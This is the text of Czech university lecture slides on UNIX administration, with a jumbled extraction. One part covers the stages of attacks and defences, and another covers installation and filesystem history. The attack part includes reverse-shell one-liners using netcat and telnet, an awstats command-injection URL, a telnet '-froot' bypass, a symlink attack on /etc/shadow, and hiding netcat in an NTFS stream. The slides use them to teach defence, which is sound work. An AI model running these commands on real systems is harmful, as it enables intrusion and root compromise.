Leo Galamboš. Administrace UNIXu. Leo Galamboš

Administrace UNIXu Leo Galamboš


2015

Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie

ˇ Cást I

Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu

Administrace a prostˇredí

UNIX MS-Windows

Posílení pˇrístupu UNIX MS-Windows

Vykrádání UNIX MS-Windows

Zakrytí stop UNIX MS-Windows

Zadní vrátka ˇ Záver

Obsah pˇrednášky


Lokalizace

metodika správy UNIXu

Skenování

základní administrátorské cˇ innosti

ˇ rení der ˇ Proveˇ Získání pˇrístupu

sít’ování prostˇredí menší firemní síteˇ

UNIX MS-Windows

Posílení pˇrístupu UNIX

domácí sít’ (PXE+iSCSI, NAS+KVM) konkrétní techniky napadení a ochrany

MS-Windows





Internet

IPSec

Štít

Administrativa Útoky Anatomie

Lokalizace

Road warrior

Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX

Dohled

MS-Windows

Tisk

SMTP


Vykrádání

Zálohování

UNIX MS-Windows

DNS

Zakrytí stop UNIX

AMD

NIS/YP

MS-Windows

Zadní vrátka NFS

ˇ Záver

Požadavky na zápoˇcet a zkoušku

Administrace UNIXu Leo Galamboš Administrativa Útoky

Zápoˇcet

Anatomie

Lokalizace

konkrétní požadavky urˇcuje cviˇcící

Skenování

nutný pro pˇrihlášení ke zkoušce

ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows


Zkouška nejvýše jeden pˇredtermín (v pˇrípadeˇ zájmu) práveˇ 3 termíny v ˇrádném zkouškovém

MS-Windows




Administrace UNIXu Leo Galamboš Administrativa

Varování

Útoky Anatomie

Tato pˇrednáška popisuje obecné postupy, kterým je nutné bránit – efektivní obrana je vždy založena na znalosti formy útoku. Tento studijní materiál není v žádném pˇrípadeˇ návodem k jakýmkoliv nezákonným aktivitám.

Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows



ˇ Doplnkové zdroje: RFC2196



Administrace UNIXu

Anatomie útoku

Leo Galamboš Zajištění prostoru jmen, IP adres, zájmových osob

Lokalizace

Administrativa

Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...

Útoky Skenování

Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...

Anatomie

Lokalizace

Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...

ˇ rení der ˇ Proveˇ Vytěžení cílů

Získání přístupu

Zvýšení získaných oprávnění

Skenování

Prověření děr

Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...

Posílení přístupu

UNIX MS-Windows

Posílení pˇrístupu

Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...

UNIX

Vykrádání

Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...

Zakrytí průniku před administrátory a dozorem

Získání pˇrístupu

MS-Windows


Zakrytí stop

Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...

Zakrytí stop Vytvoření vrátek a mostů pro opětovné získání nadvlády

Zadní vrátka

?

UNIX MS-Windows

Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...


Administrace UNIXu

Tor

Leo Galamboš Administrativa

zakrytí vlastní identity a stop pˇri vyšetˇrování

Útoky

vrstvená architektura ("Onion network")

Lokalizace

aplikaˇcní nezávislost via TCP/SOCKS

Skenování

torbutton: Add-on pro Firefox

ˇ rení der ˇ Proveˇ

Anatomie

Získání pˇrístupu UNIX MS-Windows


# tor-resolve www.cvut.cz 147.32.3.39 # tcpdump -i eth0 -n port 53 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes ^C 0 packets captured 0 packets received by filter 0 packets dropped by kernel

MS-Windows




Administrace UNIXu

Nevýhoda Tor Menší síla a variabilita jak vlastní botNET.

Leo Galamboš Administrativa Útoky Anatomie

# proxychains nmap -sT -PN -n -sV -p 21,22,80 www.fd.cvut.cz ProxyChains-3.1 (http://proxychains.sf.net)

Lokalizace

Starting Nmap 5.21 ( http://nmap.org ) at CENSORED CEST |DNS-request| www.fd.cvut.cz |S-chain|-<>-127.0.0.1:9050-<><>-CENSORED:53-<><>-OK |DNS-response| www.fd.cvut.cz is 147.32.100.7 |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:22-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:21-<--timeout |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:22-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:80-<><>-OK Nmap scan report for www.fd.cvut.cz (147.32.100.7) Host is up (0.97s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 22/tcp open ssh OpenSSH 4.3p2 Debian 9etch3 (protocol 2.0) 80/tcp open http Apache httpd Service Info: OS: Linux


Nmap done: 1 IP address (1 host up) scanned in 27.16 seconds

Zadní vrátka

Skenování





ˇ Záver

ˇ Vytežení DNS


http://(vpn,fw,owa,outlook).cvut.cz/ ˇ vytežení DNS (AXFR) $ > > >

nslookup server 147.32.266.8 set type=ANY ls -d ex.cvut.cz.

# proxychains dig +tcp @CENSORED fd.cvut.cz AXFR ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:9050-<><>-CENSORED:53-<><>-OK

Útoky Anatomie



; <<>> DiG 9.4.3-P5 <<>> +tcp @CENSORED fd.cvut.cz AXFR ; (1 server found) ;; global options: printcmd : fd.cvut.cz. IN NS ns.cvut.cz. fd.cvut.cz. IN NS ns1.horska.fd.cvut.cz. fd.cvut.cz. IN NS dhcp.fd.cvut.cz. _samba._tcp.fd.cvut.cz. IN SRV 10 1 139 firewall.fd.cvut.cz. _samba._tcp.fd.cvut.cz. IN SRV 10 1 445 firewall.fd.cvut.cz. _vlmcs._tcp.fd.cvut.cz. IN SRV 0 0 1688 kms.vc.cvut.cz. :

MS-Windows




ˇ údaju˚ Sber


webové prezentace, dceˇrinné spoleˇcnosti ˇ ˇ usenet) údaje o zamestnancích (sociální síte, IT: osoby chránící systémy MRK, SLS: social-hacking MNGMNT: nerozumí IT, mají ale moc

outsourcing www (poznámky v HTML)

Anatomie



struktura AS v okolí – útok na síteˇ bezpeˇcnostních složek ˇ Google map umožnuje orientaci na místeˇ cˇ inu ochrana(?): RFC 2196

MS-Windows




Administrace UNIXu

ˇ (historických) údaju˚ Sber


ˇ Webové stránky – zamestnanci, SW, IS/IT http://www.archive.org/ Usenet/NNTP

Webové stránky – Google

Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu

1

Google hacking database Athena2 , SiteDigger3 , Nikto/Wikto4

UNIX MS-Windows




1

http://johny.ihackstuff.com/ghdb.php 2 http: //www.snakeoillabs.com/downloads/Athena2.0.msi 3 http://www.foundstone.com/ 4 http://www.sensepost.com/research/wikto


Problém veˇrejných bází (whois, dns registry)


Lokalizace

obsahují citlivé údaje naivní správa domain hijacking 5 ˇ AOL pˇresmerována na autonete.net

mají webová rozhraní - archívy WWW stránek

Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows


(nedokonalé) ˇrešení: "anonymní"info@, POBox, atp.




5

autorizováno dle FROM položky z e-mailu

Administrace UNIXu

Anatomie útoku


Lokalizace

Administrativa


Útoky Skenování


Anatomie

Lokalizace





Skenování

Prověření děr



UNIX MS-Windows



UNIX

Vykrádání




MS-Windows


Zakrytí stop



Zadní vrátka

?

UNIX MS-Windows



Skenování portu˚ a OS


ˇ TCP/UDP portu˚ v LISTENING stavu zjištení

Administrativa

side-effect: verze OS (dle chování IP stacku)

Útoky

pasivní detekce OS: siphon

Lokalizace

nmap mnoho typu˚ skenu˚ TCP full/SYN/FIN/Xmas/Null, stealth mód strobe a tcp_scan (SAINT) pouze tcp udp_scan (SATAN, SAINT) je spolehlivý, ale i dobˇre zachytitelný v IDS MS-Windows: Netcat, SuperScan, WUPS, ScanLine

Anatomie




Zakrytí stop

Ochrana Detekce pomocí a

UNIX MS-Windows

snorta .

Dokonalá ochrana neexistuje.


http://www.snort.org/

ICMP


výborný protokol pro analytiku síteˇ velmi nebezpeˇcný, pokud je používán v plné šíˇri ˇ loki2 umožnuje tunelování via ICMP ECHO

Anatomie



Routery, CISCO ICMP 13 (timestamp) muže ˚ prozradit cˇ asovou zónu, tj. ˇ umístení. ICMP 17 (address mask) muže ˚ prozradit broadcast a vést k efektivnímu DoS.

MS-Windows




DNS


ˇ verze, patch úrovne, ˇ a nekdy ˇ Zjištení i typu a verze O/S

Útoky Anatomie

# dig @147.32.103.3 version.bind CH TXT

Lokalizace

; <<>> DiG 9.4.3-P5 <<>> @147.32.103.3 version.bind CH TXT ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62844 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; WARNING: recursion requested but not available


Posílení pˇrístupu ;; QUESTION SECTION: ;version.bind. CH TXT

UNIX MS-Windows

;; ANSWER SECTION: version.bind. 0 CH TXT "9.3.6-P1-RedHat-9.3.6-4.P1.el5_4.2"

Vykrádání

;; AUTHORITY SECTION: version.bind. 0 CH NS version.bind.

Zakrytí stop

UNIX MS-Windows

UNIX MS-Windows


cheops-ng.sf.net







Administrace UNIXu

Anatomie útoku


Lokalizace

Administrativa


Útoky Skenování


Anatomie

Lokalizace





Skenování

Prověření děr



UNIX MS-Windows



UNIX

Vykrádání




MS-Windows


Zakrytí stop



Zadní vrátka

?

UNIX MS-Windows



Bannery


# telnet www.fd.cvut.cz 80 Trying 147.32.100.7... Connected to www.fd.cvut.cz. Escape character is ’^]’. HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: CENSORED Server: Apache Connection: close Content-Type: text/html # telnet fdlin.fd.cvut.cz. smtp Trying 147.32.100.10... Connected to fdlin.fd.cvut.cz.. Escape character is ’^]’. 220 fdlin.fd.cvut.cz ESMTP Postfix






Listování položek


MS RPC – epdump (Reskit), rpcdump6 MS NMB – nmbscan MS zdroje – DumpSec7 ˇ ruje, zda je DNS cache snooping: útoˇcník proveˇ záznam v keši


Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX

DNS AXFR (viz dˇríve)

MS-Windows


MS SMB null-session net use \\147.32.300.8\IPC$ ""/u:"" nebo vše v jednom skrze NBTEnuma

MS-Windows


Zakrytí stop UNIX

a

http://ntsleuth.0catch.com/

MS-Windows

Zadní vrátka ˇ Záver 6 7

http://oss.coresecurity.com/impacket/rpcdump.py http://www.somarsoft.com/

Administrace UNIXu

Anatomie útoku


Lokalizace

Administrativa


Útoky Skenování


Anatomie

Lokalizace





Skenování

Prověření děr



UNIX MS-Windows



UNIX

Vykrádání




MS-Windows


Zakrytí stop



Zadní vrátka

?

UNIX MS-Windows



Útoky na UNIX


Lokalizace

brute-force: THC-Hydra8 buffer-overflow: stack/heap execution


nekontrolovaný vstup: telnet -l "-froot"147.32.300.69

MS-Windows





http://freeworld.thc.org/thc-hydra/ Solaris 10 in.telnetd, podobneˇ AIX a rlogin

Administrace UNIXu

Reverse telnet Pˇres vadnou webovou aplikaci vyvolání telnet spoje k útoˇcníkovi


ˇ firewall ji vetšinou pustí do portu˚ 80, 8080 atp.

Útoky

útoˇcník použije nc (netcat) v listening režimu

Lokalizace

telnet ip 80 | bash | telnet ip 8080 ../awstats.pl?configdir=|echo%20;echo%20;telnet%20ip%2080. .

Anatomie


jednodušeji též nc -e bash ip 80

MS-Windows


8080


bash


80


BIND/DNS


DNS cache poisoning podvržení záznamu˚ v DNS keši citlivé jen pro konkrétní verze (skenování version.bind)

Anatomie


vyvolání sekvence dotazu˚ – CNAME, delegování – a odhalení sekvence portu˚ a DNS ID

MS-Windows



Zakrytí stop

DNS TSIG overflow (starší verze BIND)

UNIX MS-Windows


Administrace UNIXu

SSH

Leo Galamboš

ˇ ˇ v OpenSSH Existovalo nekolik vážných der

Administrativa

napˇríklad int overflow v challenge-response auth proceduˇre

Útoky

útoˇcník získá práva root-a

Skenování

Anatomie

Lokalizace



Monitor

UNIX MS-Windows


Zakrytí stop

Kryptomateriál

UNIX MS-Windows

Útočník

Otrok 1

Otrok 2

Systém


Útok na promisc mód


ˇ typicky pod root-em monitoring, IDS beží

Anatomie

Lokalizace

vhodneˇ podvržený packet dokáže prostˇrelit systém

Skenování

ˇ úspešné útoky na tcpdump i snort


ˇ infikovaný doplatí na svoji "zvedavost"


útoˇcník cíl nijak nekontaktuje!



Viz. Hispahack Research Team http://hispahack.ccc.de/



Administrace UNIXu

Útoky na MS-Windows


autentizaˇcní spoofing: brute-force, MTM, slovník vzdálený útok: Metasploit10 útok na aplikace: Office,

IE11


útok na ovladaˇce: Netgear 802.11 Beacon remote code execution12

MS-Windows




Zadní vrátka 10

testy zranitelností http://framework.metasploit.com/ Napˇríklad buffer-overflow LoadAniIcon/user32.dll 12 Cache, Moore, skape http://www.uninformed.org/?v=all&a=29&t=sumry 11

ˇ Záver

Autentizaˇcní spoofing


Lokalizace

software: enum, Brutus, Medusa, Venom, ad. ˇ pˇri správné politice nebývá úspešný


Ochrana Dobrá bezpeˇcnostní pravidla, napˇr. silná hesla, zamykání hesla, kontrola Event logu,. . .





Odposlech hesla


Lokalizace

Útok na LanManager, NTLM a Kerberos LN se láme nejlépe: Cain, LCP13 , l0pthcrack ˇ brute-force, slovník NTLM se láme špatne:


K5 lze zlomit slovníkovým útokem na první packet zašifrovaný klíˇcem odvozeným z hesla


Cain láme vše, navíc umí ARP spoof

Vykrádání

UNIX MS-Windows

UNIX MS-Windows



13

http://www.lcpsoft.com/

MTM: spící muž uprostˇred


Lokalizace

smbrelay a smbproxy14 Cain


Ochrana


Autentizace a šifrování komunikace. Firewall s IPsec?

MS-Windows




14

crackují heše hesel

Administrace UNIXu

Anatomie útoku


Lokalizace

Administrativa


Útoky Skenování


Anatomie

Lokalizace





Skenování

Prověření děr



UNIX MS-Windows



UNIX

Vykrádání




MS-Windows


Zakrytí stop



Zadní vrátka

?

UNIX MS-Windows



Symlink hack


symlink vedeme na systémový soubor

Lokalizace

ˇ práva vadnou utilitu necháme zmenit


Solaris-like pˇríklad


$ ln -s /etc/shadow /var/dt/appconfig/appmanager/generic-display-0 $ /usr/dt/bin/dtappgather MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists $ ls -l /etc/shadow -r-xr-xr-x 1 ivan staff ....




UNIX


Core file

Útoky Anatomie

vyvolání coredump v serverové aplikaci

Lokalizace

výsledný dump muže ˚ obsahovat cˇ ásti shadow báze

Skenování

ˇ úspešné na FTPD (pˇri PASV pˇred nalogováním)



Race conditions na wu-ftpd ABOR zpusoboval ˚ SIGURG

UNIX MS-Windows

Vykrádání UNIX

zavˇrení portu data-spoje vyvolalo SIGPIPE SIGPIPE: dologout()-uid0-writeLogs-closeLogs-exit

MS-Windows


ABOR po pˇrechodu na uid0 dává root-a po FTP


UNIX


Sdílené knihovny modifikace LD_PRELOAD ˇ in.telnetd umožnoval aktivaci s modifikovaným LD_PRELOAD a aktivace /bin/login pak muže ˚ linkovat povrženou autentizaˇcní rutinu

Útoky Anatomie



Vady kernelu - cˇ istý exploit z ringu 0 eskalace z “libovolného” uživatele na root-a

MS-Windows


ˇ SELinux a spol. pomuže ˚ jen nekdy napˇríklad vada ovladaˇcu˚ LKM: enyelkm, SucKIT, MoodNT



Administrace UNIXu

Microsoft Windows


Lokalizace Skenování ˇ rení der ˇ Proveˇ

ˇ vetšina slabin se pravidelneˇ opravuje getadmin útoky skrze DLL

injection15






15

Vyžaduje interaktivní sezení

Administrace UNIXu

Anatomie útoku


Lokalizace

Administrativa


Útoky Skenování


Anatomie

Lokalizace





Skenování

Prověření děr



UNIX MS-Windows



UNIX

Vykrádání




MS-Windows


Zakrytí stop



Zadní vrátka

?

UNIX MS-Windows



UNIX


John the Ripper ˇ utilita na lámání hesel nejoblíbenejší inteligentní tvorba hintu˚


Lokalizace Skenování

Modular Crypt Format (MCF) 1MD5/2BLF:Salt:Hash

ˇ rení der ˇ Proveˇ Získání pˇrístupu

root:$1$nLP5O79D$fghsiorn6wedie777:14201... halt:*:9797:0::::: operator:*:9797:0:::::

UNIX MS-Windows



Sít’ová komunikace HTTP Suru attack proxy16 DP na MFF



16

http://www.sensepost.com/labs/tools/pentest/suru

Administrace UNIXu

MS-Windows získání hesel/hešu˚


pˇri fyzickém pˇrístupu (VM) – WinPE a

BartPE17

pwdump utility18 skrze priv. mode DLL injection lsass.exe – vyžaduje práva Administrátora

Útoky Anatomie


Keš Local Security Authority

(LSA)19

hesla pro pˇrístup stroje k doméneˇ 10 posledních hešu˚ nalogovaných uživatelu˚ hesla služeb, ftp/www hesla, RAS úˇcty

MS-Windows




Zadní vrátka ˇ Záver 17

http://www.nu2.nu/pebuilder/ 18 http://www.foofus.net/ 19 HKLM\SECURITY\Policy\Secrets

Administrace UNIXu

MS-Windows cracking


Lokalizace

ˇ Windows nemají salt a to usnadnuje útoky LM dává pouhých

237

heší (znaky jsou

SW: John21 , ntbf22 , Cain23 , LCP24 , ad.

uppercase)20





20

P. Oechslin (2003): prolomeno za 14 sekund. 21 http://www.openwall.com/john/ 22 http://www.toolcrypt.org/ 23 http://www.oxid.it/ 24 http://www.lcpsoft.com/


Administrace UNIXu

Anatomie útoku


Lokalizace

Administrativa


Útoky Skenování


Anatomie

Lokalizace





Skenování

Prověření děr



UNIX MS-Windows



UNIX

Vykrádání




MS-Windows


Zakrytí stop



Zadní vrátka

?

UNIX MS-Windows



UNIX


Instalace rootkitu25 trojan: zmodifikovaný program login, ps,. . .

Útoky Anatomie

Lokalizace Skenování

back-door inetd nebo webapp


sniffery: dsniff, wireshark,. . .


cˇ istiˇc logu: logclean-ng

UNIX MS-Windows


Vykrádání UNIX

Rathole a.k.a. rat – hole

MS-Windows


Zadní vrátka ˇ Záver 25

http://packetstormsecurity.org/UNIX/penetration/ rootkits/

MS-Windows


vypnutí auditu auditpol /disable (Resource Kit) ˇ Event logu elsave26 vyˇcištení zakrytí souboru˚ hidden pˇríznak alternate data streams (NTFS) odhalí sfind27

Anatomie



> cp nc.exe enemyterritory.exe:nc.exe > start enemyterritory.exe:nc.exe

UNIX MS-Windows




http://www.ibt.ku.dk/jesper/Windowstools http://www.foundstone.com/

Administrace UNIXu

Anatomie útoku


Lokalizace

Administrativa


Útoky Skenování


Anatomie

Lokalizace





Skenování

Prověření děr



UNIX MS-Windows



UNIX

Vykrádání




MS-Windows


Zakrytí stop



Zadní vrátka

?

UNIX MS-Windows



MS-Windows


Lokalizace

netcat poslouchá na portu a po pˇripojení spustí proces, napˇr. cmd.exe psexec využívá pˇrímo SMB


Back-door payloads nabízí i Metasploit WinVNC fpipe pro redirekci TCP spoju˚





Pouˇcení administrátovo


IP adresa útoˇcníka je cˇ asto falešná do veˇrejných bází vkládejte jen nutné údaje provozujte jen protokoly, kterým rozumíte (ICMP tunel) neposkytujte zbyteˇcneˇ cˇ ísla verzí software



pravidelneˇ aktualizujte (BIND, exploity) instalujte jen nezbytný software (telnet, nc?)

MS-Windows


ˇ vyžaduje dohled IDS není všelék, rovnež vyžadujte kvalitní hesla separujte servery a klienty (napˇr. via DMZ)



servery bez shell pˇrístupu (exploit ring-0, LKM)

Zadní vrátka

správné nastavení FW – omezte i odchozí tok

ˇ Záver


ˇ ˇ rit? Cemu lze skuteˇcneˇ v IS/IT veˇ — Niˇcemu, nemáte-li kvalitní bezpeˇcnostní politiku


Lokalizace Skenování ˇ rení der ˇ Proveˇ

Lze se ochránit? ˇ — Ano, s velkým štestím a pedantským pˇrístupem



Vykrádání UNIX

Co když meˇ dostanou? — Máte obrovskou pˇríležitost pochopit jak k tomu došlo

MS-Windows



Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace Po instalaci

ˇ Cást II

Souborové systémy Minix Filesystem ext2 Další vývoj fsck

Instalace a základní obsluha

Benchmark Linuxu

ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV Nová vlna

Instalace software Správa uživatelu˚ Dodatky Cviˇcení

Obsah


11

Instalace

Instalace Pˇred instalací Instalace Po instalaci

12

Souborové systémy

Souborové systémy Minix Filesystem ext2

13

ˇ Behové úrovneˇ OS

Další vývoj fsck Benchmark Linuxu


14

Instalace software

Start OS Vypnutí OS *BSD OpenBSD

15

Správa uživatelu˚

SystemV Nová vlna

Instalace software

16

Dodatky

Správa uživatelu˚ Dodatky Cviˇcení

17

Cviˇcení

ˇ základních parametru˚ Pˇred instalací: zjištení



poˇcet uživatelu˚ ⇒ HW specifikace ˇ nasazení ⇒ rozdelení disku parametry síteˇ




Instalace


Souborové systémy

ˇ rozdelení na diskové oblasti formátování

Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu

konfigurace síteˇ instalace systémových balíku˚

ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD

základní konfigurace systému

OpenBSD SystemV Nová vlna


Instalace OpenBSD 4.5


Souborové systémy Minix Filesystem ext2 Další vývoj fsck Benchmark Linuxu


Instalace software Správa uživatelu˚ Dodatky

ˇ pro pˇrehrání videa Kliknete

Cviˇcení

Po instalaci

Administrace UNIXu Leo Galamboš Instalace

kontrola konfigurace

Pˇred instalací Instalace Po instalaci

ˇ kontrola bežících procesu˚ ˇ rení velikosti podstromu˚ meˇ


instalace (anti)rootkit nástroju˚


Pomucky ˚ — OpenBSD fstat(1) otevˇrené soubory

ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD

ˇ ps(1) bežící procesy

SystemV Nová vlna

netstat(1) otevˇrené sockety

Instalace software

sysctl(8) parametry kernelu


pstat(1) systémové položky

Dodatky Cviˇcení

Unix a souborové systémy


Souborové systémy Minix Filesystem

jeden souborový strom

ext2

Virtual File System (VFS) pro pˇripojení více typu˚ FS

fsck

ˇ metadat jsou typicky žurnálový FS: zmeny 28 atomické

Další vývoj

Benchmark Linuxu



28

unlink(1), mkdir(1), rmdir(1). . .

Unix a souborové systémy – speciality


sparse files: soubory s dírami po lseek(3) souˇcet velikostí souboru˚ muže ˚ pˇresáhnout kapacitu disku skuteˇcná velikost viz du(1)


snapshot: “konzistentní” snímek FS následneˇ modifikovaný puvodní ˚ obsah se ukládá ve sparse file na dalším FS snímek (napˇr. /dev/fssnap/xyz) lze RO/RW mountovat a dodateˇcneˇ studovat cˇ i zálohovat ˇ výhody: zajišt’uje konzistenci dat behem zálohování



Administrace UNIXu

Inody

Leo Galamboš Instalace Pˇred instalací Instalace

atributy souboru: UID, GID, délka, cˇ as

Po instalaci

Souborové systémy

odkazy na datové bloky


ˇ Behové úrovneˇ OS Start OS

Struktura Adresáˇr Soubor Speciální soubor Roura, socket Symbolický link

Poˇcet inodu˚ 1 1 1 1 1

Poˇcet datových bloku˚ N (obsah adresáˇre s odkazy na inody) N (dle délky souboru) 0 0 ˇ 1; 0 (je-li cíl zanesen v inode)

Vypnutí OS *BSD OpenBSD SystemV Nová vlna


Administrace UNIXu

ˇ Rozdelení a struktura disku


/

/usr

/usr/local

Po instalaci

Souborové systémy

bin

bin

bin

dev

include

etc

ext2

lib

lib

fsck

root

local

sbin

sbin

sbin

share

usr

share

etc lib

Minix Filesystem

Další vývoj

Benchmark Linuxu


tmp var


Instalace software Správa uživatelu˚

Filesystem Hierarchy Standard http: //www.pathname.com/fhs/pub/fhs-2.3.html

Dodatky Cviˇcení

ˇ Rozdelení disku

Administrace UNIXu Leo Galamboš Instalace Pˇred instalací

Správa disku

Instalace Po instalaci

diskové oddíly = pˇripojované svazky diskové oddíly skrze Volume Management


Pro každý podstrom se hodí jiný typ filesystému s jinými parametry. /

ext2, suid povolen, RO


/home

reiserfs, notail, suid zakázán, RW

bezpeˇcnost! ...


Administrace UNIXu

Linux Gentoo

Leo Galamboš

Filesystem /dev/hda3 udev /dev/hda5 /dev/hda6 /dev/hda7 /dev/hda8 /dev/hda9 /dev/hda10 none

1K-blocks 125432 452044 5859784 977180 2930080 3906308 3906308 59316904 452044

Used Available Use% Mounted on 79300 46132 64% / 224 451820 1% /dev 4475476 1384308 77% /usr 36616 940564 4% /tmp 325552 2604528 12% /var 1096880 2809428 29% /opt 2437456 1468852 63% /home 26244260 33072644 45% /disk0 0 452044 0% /dev/shm



ˇ Behové úrovneˇ OS Start OS Vypnutí OS

OpenBSD 3.7

*BSD OpenBSD SystemV

Filesystem /dev/wd0a /dev/wd0h /dev/wd0g /dev/wd0f /dev/wd0d /dev/wd0e

512-blocks 513628 1800580 1027420 513692 2061100 2061100

Used 55640 4 4 4 1013688 14344

Avail Capacity 432308 11% 1710548 0% 976048 0% 488004 0% 944360 52% 1943704 1%

Mounted on / /disk0 /home /tmp /usr /var

Nová vlna


Logical Volume Management


Základní filosofie

Instalace Pˇred instalací Instalace

odbourání pˇrímé vazby mezi blokem FS a fyzickým blokem na disku ˇ mezivrstva umožnuje pˇridávání a odebírání disku, ˚ ˇ podporu pro nekteré typy RAID

Po instalaci


fyzické disky jsou slouˇceny do Volume Group Logical volumes se alokují z Volume Group


Výhody ˇ velikost používaných logických oblastí (LV) lze menit


Instalace software

možnost pˇrístupu skrze pojmenované oddíly, nikoliv fyzická oznaˇcení diskových zaˇrízení


ˇ snadná výmena disku, ˚ pˇresuny diskových oddílu˚

Cviˇcení

Dodatky

Administrace UNIXu

Typický UFS

Leo Galamboš Instalace Cylinder Group 0

Cylinder Group 1

Cylinder Group n


ˇ c (Boot block) Zavadeˇ

Souborové systémy

Datová oblast Info o fs (Super block)

Minix Filesystem

Datová oblast Cylinder Group Map

Info o fs (Super block)

ext2 Další vývoj fsck Benchmark Linuxu

i-nodes


Cylinder Group Map

Start OS Vypnutí OS *BSD

i-nodes

Info o fs (Super block)


Cylinder Group Map Datová oblast


Datová oblast

i-nodes

Dodatky Cviˇcení

Datová oblast

ˇ Císlování inod


1

bad block i-node

2

root i-node

3

acl index i-node

4

acl data i-node

5

boot loader i-node

6

undelete directory i-node

7

rezervováno




8

rezervováno


Instalace software

9

rezervováno


10

rezervováno

Dodatky Cviˇcení

Softwarové prostˇredky


inicializace mkfs(8), newfs(8) pˇripojení mount(8)


modifikace tune2fs(8), extendfs(8), growfs(8) odpojení umount(8)

Benchmark Linuxu


opravy fsck(8) zálohování dump(8), restore(8)

*BSD OpenBSD SystemV Nová vlna


Historie Linuxu



Linux zaˇcal s Minix FS (1980, Andrew S. Tanenbaum) adresy bloku˚ jsou jen 16b cˇ ísla ⇒ 64MB svazky názvy souboru˚ jen 14 znaku˚ adresáˇre s pevným poˇctem položek




Administrace UNIXu

Minix FS

Leo Galamboš Instalace

ˇ c (Boot blok) Zavadeˇ

Pˇred instalací Instalace

Info o filesystému (Super block)

Po instalaci

Souborové systémy

0/1 bitová mapa inodu˚

Minix Filesystem ext2 Další vývoj

0/1 bitová mapa zón

fsck

2 Oblast inodu˚

Benchmark Linuxu


1


Datová oblast


1 2

je pˇríslušná zóna obsazena? je pˇríslušná inoda živá?

Historie Linuxu


ˇ lepšího (ext fs) V dubnu 1992 vznikl první pokus o neco


zvládne 2GB soubor i svazek názvy souboru˚ do 255 znaku˚

Po instalaci


Kritika ext fs 1

2

spojový seznam drží volné bloky a inody, cˇ asem je ˇ a nastává degradace výkonu nesetˇrídený není solidní podpora pro cˇ asové znaˇcky, . . .


ˇ Behové úrovneˇ OS Start OS Vypnutí OS *BSD OpenBSD SystemV

VFS v kernelu zjednodušuje pˇridávání dalších FS

Nová vlna

Instalace software

Chris Provenzano (autor)


Linus Torvalds (rewrite)

Dodatky

Duležitý ˚ základ pro existenci více FS v rámci systému.

Cviˇcení

Vnitˇrní struktura Linuxu (kernel space)

Administrace UNIXu Leo Galamboš Instalace Pˇred instalací Instalace

Rozhraní systémových volání

Po instalaci


Inodová keš

VFS

Adresáˇrová keš



Implementace FS


Buffer keš


Ovladaˇc diskového zaˇrízení

Administrace UNIXu

Následníci ext fs: Xia a ext2

Leo Galamboš

Xia

Instalace

založeno na Minixu

Pˇred instalací Instalace

podpora pro dlouhé názvy souboru˚ (248 znaku) ˚ a ˇ svazky (2GB) vetší

Po instalaci


podpora pro tˇri cˇ asové znaˇcky

ext2 Další vývoj

Ext2 (leden 1993, Rémy Card) dovoluje navíc

fsck Benchmark Linuxu

ˇ promennou velikost bloku (1kB, 2kB, 4kB)


rozšiˇritelnost FS Minix Ext Xia Ext2

Svazek 64MB 2GB 2GB 4TB

Vypnutí OS *BSD

Soubor 64MB 2GB 64MB 2GB

NázevS 14 255 248 255

Blok pevný pevný pevný var

(Jedná se o stav v roce 1993)

ˇ 3Cas ne ne ano ano



Administrace UNIXu

Struktura ext2

Leo Galamboš

ˇ c (Boot sektor) Zavadeˇ První skupina bloku˚ Druhá skupina bloku˚ ...



N-tá skupina bloku˚


Super block Deskriptory FS Bitová mapa bloku˚ Bitová mapa inodu˚


Instalace software

Oblast inodu˚


Oblast bloku˚

Dodatky

Velice podobná FFS z BSD (cylinder group FFS odpovídá blocks group ext2)

